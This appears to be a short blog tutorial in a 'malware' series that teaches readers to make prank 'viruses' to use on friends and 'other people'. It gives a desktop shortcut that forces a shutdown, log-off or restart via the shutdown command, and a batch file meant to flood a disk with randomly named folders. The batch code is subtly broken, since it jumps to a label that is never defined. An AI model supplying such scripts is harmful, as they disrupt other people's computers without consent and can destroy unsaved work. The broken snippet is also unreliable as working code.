How To Make Interesting Viruses

On different episode of malware you have learned a lot of things about viruses and worms and after reading episode 3 have able to make your own virus by eh-virus maker.
Now at this time i will show you how make some interesting and little bit funny viruses to make fun with your friends and other people.

  • First one is the virus that shutdown any PC after execute here is the steps to make this. 
Create shortcut,(Right click on your desktop and go to new -> shortcut )
After this will appear window and that is where you type the code

shutdown -s -t 300 -c "Your Message"

To log of computer type
shutdown -l -t 300 -c "your message"
To restart computer type
shutdown -r -t 300 -c " your message"
Click next and than finish, your virus has been saved on your desktop.

  • On the second is the virus which creates multiple folders in a second. 
  1. Open a notepad and type 
@echo off
color 0a
md %random%
goto eh 

Now save this file to anyname.bat    And whenever someone click on this file it creates a lot of folders in a second like:

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